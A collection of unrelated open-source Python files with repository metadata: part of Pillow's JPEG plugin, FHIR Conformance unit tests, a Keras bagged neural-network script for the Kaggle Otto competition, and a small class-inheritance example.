0xFFEC: ("APP12", "Application segment 12", APP),
0xFFED: ("APP13", "Application segment 13", APP),
0xFFEE: ("APP14", "Application segment 14", APP),
0xFFEF: ("APP15", "Application segment 15", APP),
0xFFF0: ("JPG0", "Extension 0", None),
0xFFF1: ("JPG1", "Extension 1", None),
0xFFF2: ("JPG2", "Extension 2", None),
0xFFF3: ("JPG3", "Extension 3", None),
0xFFF4: ("JPG4", "Extension 4", None),
0xFFF5: ("JPG5", "Extension 5", None),
0xFFF6: ("JPG6", "Extension 6", None),
0xFFF7: ("JPG7", "Extension 7", None),
0xFFF8: ("JPG8", "Extension 8", None),
0xFFF9: ("JPG9", "Extension 9", None),
0xFFFA: ("JPG10", "Extension 10", None),
0xFFFB: ("JPG11", "Extension 11", None),
0xFFFC: ("JPG12", "Extension 12", None),
0xFFFD: ("JPG13", "Extension 13", None),
0xFFFE: ("COM", "Comment", COM)
}
def _accept(prefix):
return prefix[0:1] == b"\377"
##
# Image plugin for JPEG and JFIF images.
class JpegImageFile(ImageFile.ImageFile):
format = "JPEG"
format_description = "JPEG (ISO 10918)"
def _open(self):
s = self.fp.read(1)
if i8(s) != 255:
raise SyntaxError("not a JPEG file")
# Create attributes
self.bits = self.layers = 0
# JPEG specifics (internal)
self.layer = []
self.huffman_dc = {}
self.huffman_ac = {}
self.quantization = {}
self.app = {} # compatibility
self.applist = []
self.icclist = []
while True:
i = i8(s)
if i == 0xFF:
s = s + self.fp.read(1)
i = i16(s)
else:
# Skip non-0xFF junk
s = self.fp.read(1)
continue
if i in MARKER:
name, description, handler = MARKER[i]
# print hex(i), name, description
if handler is not None:
handler(self, i)
if i == 0xFFDA: # start of scan
rawmode = self.mode
if self.mode == "CMYK":
rawmode = "CMYK;I" # assume adobe conventions
self.tile = [("jpeg", (0, 0) + self.size, 0,
(rawmode, ""))]
# self.__offset = self.fp.tell()
break
s = self.fp.read(1)
elif i == 0 or i == 0xFFFF:
# padded marker or junk; move on
s = b"\xff"
elif i == 0xFF00: # Skip extraneous data (escaped 0xFF)
s = self.fp.read(1)
else:
raise SyntaxError("no marker found")
def draft(self, mode, size):
if len(self.tile) != 1:
return
d, e, o, a = self.tile[0]
scale = 0
if a[0] == "RGB" and mode in ["L", "YCbCr"]:
self.mode = mode
a = mode, ""
if size:
scale = max(self.size[0] // size[0], self.size[1] // size[1])
for s in [8, 4, 2, 1]:
if scale >= s:
break
e = e[0], e[1], (e[2]-e[0]+s-1)//s+e[0], (e[3]-e[1]+s-1)//s+e[1]
self.size = ((self.size[0]+s-1)//s, (self.size[1]+s-1)//s)
scale = s
self.tile = [(d, e, o, a)]
self.decoderconfig = (scale, 0)
return self
def load_djpeg(self):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities
import subprocess
import tempfile
import os
f, path = tempfile.mkstemp()
os.close(f)
if os.path.exists(self.filename):
subprocess.check_call(["djpeg", "-outfile", path, self.filename])
else:
raise ValueError("Invalid Filename")
try:
_im = Image.open(path)
_im.load()
self.im = _im.im
finally:
try:
os.unlink(path)
except OSError:
pass
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def _getexif(self):
return _getexif(self)
def _getmp(self):
return _getmp(self)
def _fixup_dict(src_dict):
# Helper function for _getexif()
# returns a dict with any single item tuples/lists as individual values
def _fixup(value):
try:
if len(value) == 1 and not isinstance(value, dict):
return value[0]
except: pass
return value
return dict([(k, _fixup(v)) for k, v in src_dict.items()])
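# Editor-added example of the helper above:
#
#     _fixup_dict({271: (u'Canon',), 282: (72, 1)})
#     # -> {271: u'Canon', 282: (72, 1)}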
def _getexif(self):
# Extract EXIF information. This method is highly experimental,
# and is likely to be replaced with something better in a future
# version.
# The EXIF record consists of a TIFF file embedded in a JPEG
# application marker (!).
try:
data = self.info["exif"]
except KeyError:
return None
file = io.BytesIO(data[6:])
head = file.read(8)
# process dictionary
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif = dict(_fixup_dict(info))
# get exif extension
try:
# exif field 0x8769 is an offset pointer to the location
# of the nested embedded exif ifd.
# It should be a long, but may be corrupted.
file.seek(exif[0x8769])
except (KeyError, TypeError):
pass
else:
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif.update(_fixup_dict(info))
# get gpsinfo extension
try:
# exif field 0x8825 is an offset pointer to the location
# of the nested embedded gps exif ifd.
# It should be a long, but may be corrupted.
file.seek(exif[0x8825])
except (KeyError, TypeError):
pass
else:
info = TiffImagePlugin.ImageFileDirectory_v1(head)
info.load(file)
exif[0x8825] = _fixup_dict(info)
return exif
def _getmp(self):
# Extract MP information. This method was inspired by the "highly
# experimental" _getexif version that's been in use for years now,
# itself based on the ImageFileDirectory class in the TIFF plug-in.
# The MP record essentially consists of a TIFF file embedded in a JPEG
# application marker.
try:
data = self.info["mp"]
except KeyError:
return None
file_contents = io.BytesIO(data)
head = file_contents.read(8)
endianness = '>' if head[:4] == b'\x4d\x4d\x00\x2a' else '<'
# process dictionary
try:
info = TiffImagePlugin.ImageFileDirectory_v2(head)
info.load(file_contents)
mp = dict(info)
except:
raise SyntaxError("malformed MP Index (unreadable directory)")
# it's an error not to have a number of images
try:
quant = mp[0xB001]
except KeyError:
raise SyntaxError("malformed MP Index (no number of images)")
# get MP entries
mpentries = []
try:
rawmpentries = mp[0xB002]
for entrynum in range(0, quant):
unpackedentry = unpack_from(
'{0}LLLHH'.format(endianness), rawmpentries, entrynum * 16)
labels = ('Attribute', 'Size', 'DataOffset', 'EntryNo1',
'EntryNo2')
mpentry = dict(zip(labels, unpackedentry))
mpentryattr = {
'DependentParentImageFlag': bool(mpentry['Attribute'] &
(1 << 31)),
'DependentChildImageFlag': bool(mpentry['Attribute'] &
(1 << 30)),
'RepresentativeImageFlag': bool(mpentry['Attribute'] &
(1 << 29)),
'Reserved': (mpentry['Attribute'] & (3 << 27)) >> 27,
'ImageDataFormat': (mpentry['Attribute'] & (7 << 24)) >> 24,
'MPType': mpentry['Attribute'] & 0x00FFFFFF
}
if mpentryattr['ImageDataFormat'] == 0:
mpentryattr['ImageDataFormat'] = 'JPEG'
else:
raise SyntaxError("unsupported picture format in MPO")
mptypemap = {
0x000000: 'Undefined',
0x010001: 'Large Thumbnail (VGA Equivalent)',
0x010002: 'Large Thumbnail (Full HD Equivalent)',
0x020001: 'Multi-Frame Image (Panorama)',
0x020002: 'Multi-Frame Image: (Disparity)',
0x020003: 'Multi-Frame Image: (Multi-Angle)',
0x030000: 'Baseline MP Primary Image'
}
mpentryattr['MPType'] = mptypemap.get(mpentryattr['MPType'],
'Unknown')
mpentry['Attribute'] = mpentryattr
mpentries.append(mpentry)
mp[0xB002] = mpentries
except KeyError:
raise SyntaxError("malformed MP Index (bad MP Entry)")
# Next we should try and parse the individual image unique ID list;
# we don't because I've never seen this actually used in a real MPO
# file and so can't test it.
return mp
# --------------------------------------------------------------------
# stuff to save JPEG files
RAWMODE = {
"1": "L",
"L": "L",
"RGB": "RGB",
"RGBA": "RGB",
"RGBX": "RGB",
"CMYK": "CMYK;I", # assume adobe conventions
"YCbCr": "YCbCr",
}
zigzag_index = (0, 1, 5, 6, 14, 15, 27, 28,
2, 4, 7, 13, 16, 26, 29, 42,
3, 8, 12, 17, 25, 30, 41, 43,
9, 11, 18, 24, 31, 40, 44, 53,
10, 19, 23, 32, 39, 45, 52, 54,
20, 22, 33, 38, 46, 51, 55, 60,
21, 34, 37, 47, 50, 56, 59, 61,
35, 36, 48, 49, 57, 58, 62, 63)
samplings = {(1, 1, 1, 1, 1, 1): 0,
(2, 1, 1, 1, 1, 1): 1,
(2, 2, 1, 1, 1, 1): 2,
}
def convert_dict_qtables(qtables):
qtables = [qtables[key] for key in range(len(qtables)) if key in qtables]
for idx, table in enumerate(qtables):
qtables[idx] = [table[i] for i in zigzag_index]
return qtables
def get_sampling(im):
    # There's no subsampling when images have only 1 layer
# (grayscale images) or when they are CMYK (4 layers),
# so set subsampling to default value.
#
# NOTE: currently Pillow can't encode JPEG to YCCK format.
# If YCCK support is added in the future, subsampling code will have
# to be updated (here and in JpegEncode.c) to deal with 4 layers.
if not hasattr(im, 'layers') or im.layers in (1, 4):
return -1
sampling = im.layer[0][1:3] + im.layer[1][1:3] + im.layer[2][1:3]
return samplings.get(sampling, -1)
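# Editor-added note: for a baseline 4:2:2 JPEG the luma layer carries sampling
# factors (2, 1) and both chroma layers (1, 1), so the tuple built above is
# (2, 1, 1, 1, 1, 1) and get_sampling() returns 1, matching the value _save()
# uses for the "4:2:2" keyword.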
def _save(im, fp, filename):
try:
rawmode = RAWMODE[im.mode]
except KeyError:
raise IOError("cannot write mode %s as JPEG" % im.mode)
if im.mode == 'RGBA':
warnings.warn(
'You are saving RGBA image as JPEG. The alpha channel will be '
'discarded. This conversion is deprecated and will be disabled '
'in Pillow 3.7. Please, convert the image to RGB explicitly.',
DeprecationWarning
)
info = im.encoderinfo
dpi = [int(round(x)) for x in info.get("dpi", (0, 0))]
quality = info.get("quality", 0)
subsampling = info.get("subsampling", -1)
qtables = info.get("qtables")
if quality == "keep":
quality = 0
subsampling = "keep"
qtables = "keep"
elif quality in presets:
preset = presets[quality]
quality = 0
subsampling = preset.get('subsampling', -1)
qtables = preset.get('quantization')
elif not isinstance(quality, int):
raise ValueError("Invalid quality setting")
else:
if subsampling in presets:
subsampling = presets[subsampling].get('subsampling', -1)
if isStringType(qtables) and qtables in presets:
qtables = presets[qtables].get('quantization')
if subsampling == "4:4:4":
subsampling = 0
elif subsampling == "4:2:2":
subsampling = 1
elif subsampling == "4:1:1":
subsampling = 2
elif subsampling == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
subsampling = get_sampling(im)
def validate_qtables(qtables):
if qtables is None:
return qtables
if isStringType(qtables):
try:
lines = [int(num) for line in qtables.splitlines()
for num in line.split('#', 1)[0].split()]
except ValueError:
raise ValueError("Invalid quantization table")
else:
qtables = [lines[s:s+64] for s in range(0, len(lines), 64)]
if isinstance(qtables, (tuple, list, dict)):
if isinstance(qtables, dict):
qtables = convert_dict_qtables(qtables)
elif isinstance(qtables, tuple):
qtables = list(qtables)
if not (0 < len(qtables) < 5):
raise ValueError("None or too many quantization tables")
for idx, table in enumerate(qtables):
try:
if len(table) != 64:
raise
table = array.array('B', table)
except TypeError:
raise ValueError("Invalid quantization table")
else:
qtables[idx] = list(table)
return qtables
if qtables == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
qtables = getattr(im, "quantization", None)
qtables = validate_qtables(qtables)
extra = b""
icc_profile = info.get("icc_profile")
if icc_profile:
ICC_OVERHEAD_LEN = 14
MAX_BYTES_IN_MARKER = 65533
MAX_DATA_BYTES_IN_MARKER = MAX_BYTES_IN_MARKER - ICC_OVERHEAD_LEN
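        # Each APP2 marker carries at most MAX_DATA_BYTES_IN_MARKER (65519)
        # bytes of profile data; e.g. a hypothetical 102400-byte profile is
        # written as two markers holding 65519 and 36881 data bytes.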
markers = []
while icc_profile:
markers.append(icc_profile[:MAX_DATA_BYTES_IN_MARKER])
icc_profile = icc_profile[MAX_DATA_BYTES_IN_MARKER:]
i = 1
for marker in markers:
size = struct.pack(">H", 2 + ICC_OVERHEAD_LEN + len(marker))
extra += (b"\xFF\xE2" + size + b"ICC_PROFILE\0" + o8(i) +
o8(len(markers)) + marker)
i += 1
# "progressive" is the official name, but older documentation
# says "progression"
# FIXME: issue a warning if the wrong form is used (post-1.1.7)
progressive = info.get("progressive", False) or\
info.get("progression", False)
optimize = info.get("optimize", False)
# get keyword arguments
im.encoderconfig = (
quality,
progressive,
info.get("smooth", 0),
optimize,
info.get("streamtype", 0),
dpi[0], dpi[1],
subsampling,
qtables,
extra,
info.get("exif", b"")
)
# if we optimize, libjpeg needs a buffer big enough to hold the whole image
    # in a shot. Guessing on the size, at im.size bytes. (raw pixel size is
    # channels*size). This is a value that's been used in a django patch:
# https://github.com/matthewwithanm/django-imagekit/issues/50
bufsize = 0
if optimize or progressive:
# keep sets quality to 0, but the actual value may be high.
if quality >= 95 or quality == 0:
bufsize = 2 * im.size[0] * im.size[1]
else:
bufsize = im.size[0] * im.size[1]
# The exif info needs to be written as one block, + APP1, + one spare byte.
# Ensure that our buffer is big enough
bufsize = max(ImageFile.MAXBLOCK, bufsize, len(info.get("exif", b"")) + 5)
ImageFile._save(im, fp, [("jpeg", (0, 0)+im.size, 0, rawmode)], bufsize)
def _save_cjpeg(im, fp, filename):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities.
import os
import subprocess
tempfile = im._dump()
subprocess.check_call(["cjpeg", "-outfile", filename, tempfile])
try:
os.unlink(tempfile)
except OSError:
pass
##
# Factory for making JPEG and MPO instances
def jpeg_factory(fp=None, filename=None):
im = JpegImageFile(fp, filename)
try:
mpheader = im._getmp()
if mpheader[45057] > 1:
# It's actually an MPO
from .MpoImagePlugin import MpoImageFile
im = MpoImageFile(fp, filename)
except (TypeError, IndexError):
# It is really a JPEG
pass
except SyntaxError:
warnings.warn("Image appears to be a malformed MPO file, it will be "
"interpreted as a base JPEG file")
return im
# --------------------------------------------------------------------
# Registry stuff
Image.register_open(JpegImageFile.format, jpeg_factory, _accept)
Image.register_save(JpegImageFile.format, _save)
Image.register_extension(JpegImageFile.format, ".jfif")
Image.register_extension(JpegImageFile.format, ".jpe")
Image.register_extension(JpegImageFile.format, ".jpg")
Image.register_extension(JpegImageFile.format, ".jpeg")
Image.register_mime(JpegImageFile.format, "image/jpeg")
| {
"content_hash": "3f69d50b742c8e21da15c2c58af1a675",
"timestamp": "",
"source": "github",
"line_count": 736,
"max_line_length": 79,
"avg_line_length": 34.08423913043478,
"alnum_prop": 0.555608706051184,
"repo_name": "Ali-aqrabawi/ezclinic",
"id": "ef229e61157cc2a03c538b9d4d72beb35507674a",
"size": "26462",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "lib/PIL/JpegImagePlugin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "95195"
},
{
"name": "HTML",
"bytes": "233888"
},
{
"name": "JavaScript",
"bytes": "3747108"
},
{
"name": "Python",
"bytes": "6361738"
}
],
"symlink_target": ""
} |
import io
import json
import os
import unittest
from . import conformance
from .fhirdate import FHIRDate
class ConformanceTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Conformance", js["resourceType"])
return conformance.Conformance(js)
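    # Note: point FHIR_UNITTEST_DATADIR at the directory holding the example
    # JSON resources before running the tests, e.g. (hypothetical path)
    #   export FHIR_UNITTEST_DATADIR=/path/to/fhir-examples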
def testConformance1(self):
inst = self.instantiate_from("conformance-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Conformance instance")
self.implConformance1(inst)
js = inst.as_json()
self.assertEqual("Conformance", js["resourceType"])
inst2 = conformance.Conformance(js)
self.implConformance1(inst2)
def implConformance1(self, inst):
self.assertEqual(inst.acceptUnknown, "both")
self.assertEqual(inst.contact[0].name, "System Administrator")
self.assertEqual(inst.contact[0].telecom[0].system, "email")
self.assertEqual(inst.contact[0].telecom[0].value, "wile@acme.org")
self.assertEqual(inst.copyright, "Copyright © Acme Healthcare and GoodCorp EHR Systems")
self.assertEqual(inst.date.date, FHIRDate("2012-01-04").date)
self.assertEqual(inst.date.as_json(), "2012-01-04")
self.assertEqual(inst.description, "This is the FHIR conformance statement for the main EHR at ACME for the private interface - it does not describe the public interface")
self.assertEqual(inst.document[0].documentation, "Basic rules for all documents in the EHR system")
self.assertEqual(inst.document[0].mode, "consumer")
self.assertTrue(inst.experimental)
self.assertEqual(inst.fhirVersion, "1.0.0")
self.assertEqual(inst.format[0], "xml")
self.assertEqual(inst.format[1], "json")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.implementation.description, "main EHR at ACME")
self.assertEqual(inst.implementation.url, "http://10.2.3.4/fhir")
self.assertEqual(inst.kind, "instance")
self.assertEqual(inst.messaging[0].documentation, "ADT A08 equivalent for external system notifications")
self.assertEqual(inst.messaging[0].endpoint[0].address, "mllp:10.1.1.10:9234")
self.assertEqual(inst.messaging[0].endpoint[0].protocol.code, "mllp")
self.assertEqual(inst.messaging[0].endpoint[0].protocol.system, "http://hl7.org/fhir/message-transport")
self.assertEqual(inst.messaging[0].event[0].category, "Consequence")
self.assertEqual(inst.messaging[0].event[0].code.code, "admin-notify")
self.assertEqual(inst.messaging[0].event[0].code.system, "http://hl7.org/fhir/message-type")
self.assertEqual(inst.messaging[0].event[0].documentation, "Notification of an update to a patient resource. changing the links is not supported")
self.assertEqual(inst.messaging[0].event[0].focus, "Patient")
self.assertEqual(inst.messaging[0].event[0].mode, "receiver")
self.assertEqual(inst.messaging[0].reliableCache, 30)
self.assertEqual(inst.name, "ACME EHR Conformance statement")
self.assertEqual(inst.publisher, "ACME Corporation")
self.assertEqual(inst.requirements, "Main EHR conformance statement, published for contracting and operational support")
self.assertEqual(inst.rest[0].compartment[0], "http://hl7.org/fhir/compartment/Patient")
self.assertEqual(inst.rest[0].documentation, "Main FHIR endpoint for acem health")
self.assertEqual(inst.rest[0].interaction[0].code, "transaction")
self.assertEqual(inst.rest[0].interaction[1].code, "history-system")
self.assertEqual(inst.rest[0].mode, "server")
self.assertTrue(inst.rest[0].resource[0].conditionalCreate)
self.assertEqual(inst.rest[0].resource[0].conditionalDelete, "not-supported")
self.assertFalse(inst.rest[0].resource[0].conditionalUpdate)
self.assertEqual(inst.rest[0].resource[0].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[0].interaction[1].code, "vread")
self.assertEqual(inst.rest[0].resource[0].interaction[1].documentation, "Only supported for patient records since 12-Dec 2012")
self.assertEqual(inst.rest[0].resource[0].interaction[2].code, "update")
self.assertEqual(inst.rest[0].resource[0].interaction[3].code, "history-instance")
self.assertEqual(inst.rest[0].resource[0].interaction[4].code, "create")
self.assertEqual(inst.rest[0].resource[0].interaction[5].code, "history-type")
self.assertTrue(inst.rest[0].resource[0].readHistory)
self.assertEqual(inst.rest[0].resource[0].searchInclude[0], "Organization")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].definition, "http://hl7.org/fhir/SearchParameter/Patient-identifier")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].documentation, "Only supports search by institution MRN")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].modifier[0], "missing")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].name, "identifier")
self.assertEqual(inst.rest[0].resource[0].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].chain[0], "name")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].chain[1], "identifier")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].definition, "http://hl7.org/fhir/SearchParameter/Patient-careprovider")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].modifier[0], "missing")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].name, "careprovider")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].target[0], "Organization")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].type, "reference")
self.assertEqual(inst.rest[0].resource[0].searchRevInclude[0], "Person")
self.assertEqual(inst.rest[0].resource[0].type, "Patient")
self.assertFalse(inst.rest[0].resource[0].updateCreate)
self.assertEqual(inst.rest[0].resource[0].versioning, "versioned-update")
self.assertEqual(inst.rest[0].security.certificate[0].blob, "IHRoaXMgYmxvYiBpcyBub3QgdmFsaWQ=")
self.assertEqual(inst.rest[0].security.certificate[0].type, "application/jwt")
self.assertTrue(inst.rest[0].security.cors)
self.assertEqual(inst.rest[0].security.description, "See Smart on FHIR documentation")
self.assertEqual(inst.rest[0].security.service[0].coding[0].code, "SMART-on-FHIR")
self.assertEqual(inst.rest[0].security.service[0].coding[0].system, "http://hl7.org/fhir/restful-security-service")
self.assertEqual(inst.software.name, "EHR")
self.assertEqual(inst.software.releaseDate.date, FHIRDate("2012-01-04").date)
self.assertEqual(inst.software.releaseDate.as_json(), "2012-01-04")
self.assertEqual(inst.software.version, "0.00.020.2134")
self.assertEqual(inst.status, "draft")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.url, "68D043B5-9ECF-4559-A57A-396E0D452311")
self.assertEqual(inst.version, "20130510")
def testConformance2(self):
inst = self.instantiate_from("conformance-phr-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Conformance instance")
self.implConformance2(inst)
js = inst.as_json()
self.assertEqual("Conformance", js["resourceType"])
inst2 = conformance.Conformance(js)
self.implConformance2(inst2)
def implConformance2(self, inst):
self.assertEqual(inst.acceptUnknown, "no")
self.assertEqual(inst.contact[0].telecom[0].system, "other")
self.assertEqual(inst.contact[0].telecom[0].value, "http://hl7.org/fhir")
self.assertEqual(inst.date.date, FHIRDate("2013-06-18").date)
self.assertEqual(inst.date.as_json(), "2013-06-18")
self.assertEqual(inst.description, "Prototype Conformance Statement for September 2013 Connectathon")
self.assertEqual(inst.fhirVersion, "1.0.0")
self.assertEqual(inst.format[0], "json")
self.assertEqual(inst.format[1], "xml")
self.assertEqual(inst.id, "phr")
self.assertEqual(inst.kind, "capability")
self.assertEqual(inst.name, "PHR Template")
self.assertEqual(inst.publisher, "FHIR Project")
self.assertEqual(inst.rest[0].documentation, "Protoype server conformance statement for September 2013 Connectathon")
self.assertEqual(inst.rest[0].mode, "server")
self.assertEqual(inst.rest[0].resource[0].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[0].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[0].interaction[1].documentation, "When a client searches patients with no search criteria, they get a list of all patients they have access too. Servers may elect to offer additional search parameters, but this is not required")
self.assertEqual(inst.rest[0].resource[0].type, "Patient")
self.assertEqual(inst.rest[0].resource[1].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[1].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].documentation, "_id parameter always supported. For the connectathon, servers may elect which search parameters are supported")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[1].type, "DocumentReference")
self.assertEqual(inst.rest[0].resource[2].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[2].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].documentation, "Standard _id parameter")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[2].type, "Condition")
self.assertEqual(inst.rest[0].resource[3].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[3].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].documentation, "Standard _id parameter")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].documentation, "which diagnostic discipline/department created the report")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].name, "service")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].type, "token")
self.assertEqual(inst.rest[0].resource[3].type, "DiagnosticReport")
self.assertEqual(inst.rest[0].security.service[0].text, "OAuth")
self.assertEqual(inst.software.name, "ACME PHR Server")
self.assertEqual(inst.text.status, "generated")
| {
"content_hash": "d2586fa386e08b38a5377f3861f15ccb",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 275,
"avg_line_length": 69.87116564417178,
"alnum_prop": 0.6986565984722101,
"repo_name": "all-of-us/raw-data-repository",
"id": "37abfd901e6bbe39e28c186044988a703d537219",
"size": "11515",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "rdr_service/lib_fhir/fhirclient_1_0_6/models/conformance_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = '../Data/'
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
def load_data(path, train=True):
df = pd.read_csv(path)
X = df.values.copy()
if train:
X, labels = X[:, 1:-1].astype(np.float32), X[:, -1]
return X, labels
else:
X, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)
return X, ids
def preprocess_data(X, scaler=None):
if not scaler:
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
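# Illustrative example (hypothetical labels): preprocess_labels(['Class_1', 'Class_3'])
# encodes the strings to [0, 1] and, with categorical=True, one-hot expands them
# to [[1., 0.], [0., 1.]].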
def make_submission(y_prob, ids, encoder, fname):
with open(fname, 'w') as f:
f.write('id,')
f.write(','.join([str(i) for i in encoder.classes_]))
f.write('\n')
for i, probs in zip(ids, y_prob):
probas = ','.join([i] + [str(p) for p in probs.tolist()])
f.write(probas)
f.write('\n')
print("Wrote submission to file {}.".format(fname))
print("Loading data...")
X, labels = load_data(path+'train.csv', train=True)
#X=np.log(X+1)
#X=np.sqrt(X+(3/8))
X, scaler = preprocess_data(X)
y, encoder = preprocess_labels(labels)
X_test, ids = load_data(path+'test.csv', train=False)
#X_test=np.log(X_test+1)
#X_test=np.sqrt(X_test+(3/8))
X_test, _ = preprocess_data(X_test, scaler)
nb_classes = y.shape[1]
print(nb_classes, 'classes')
dims = X.shape[1]
print(dims, 'dims')
sample = pd.read_csv(path+'sampleSubmission.csv')
N = X.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=sample.columns[1:])
nfold=8
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((X_test.shape[0],9))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = X[tr], X[te], y[tr], y[te]
predTr = np.zeros((X_valid.shape[0],9))
n_bag=10
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Dense(512, input_shape=(dims,)))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(512))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
ADAM=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-8)
sgd=SGD(lr=0.01, momentum=0.9, decay=1e-6, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer="adam")
print("Training model...")
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"tmp/weights.hdf5", verbose=0, save_best_only=True)
model.fit(X_train, y_train, nb_epoch=1000, batch_size=128, verbose=2,
validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"tmp/weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(X_test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
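# pred accumulated one prediction per (fold, bag) pair above, i.e.
# nfold * n_bag = 8 * 10 = 80 models in total, so this division gives the ensemble mean.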
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
make_submission(pred, ids, encoder, fname=path+'kerasNN2.csv')
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasNN2_retrain.csv",index_label='id')
# nfold 3, bagging 5: 0.4800704 + 0.005194
# nfold 3, bagging 10: 0.4764856 + 0.0060724
# nfold 5, bagging 5: 0.470483 + 0.011645
# nfold 5, bagging 10: 0.468049 + 0.0118616
# nfold 8, bagging 10: 0.469461 + 0.0100765
# tsne, nfold 5, bagging 5: 0.474645 + 0.0109076
| {
"content_hash": "2e43eaa32554f3b23344cada07d50580",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 98,
"avg_line_length": 32.44,
"alnum_prop": 0.6789971228935471,
"repo_name": "puyokw/kaggle_Otto",
"id": "8902b1c965397ea2c03526ac1fdcedf15814dcb9",
"size": "4866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "new/src/1st_level/kerasNN2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54362"
},
{
"name": "R",
"bytes": "40237"
}
],
"symlink_target": ""
} |
class Animal(object):
def run(self):
print('Animal is Running...')
class Dog(Animal):
def run(self):
print('Dog is Running...')
class Cat(Animal):
pass
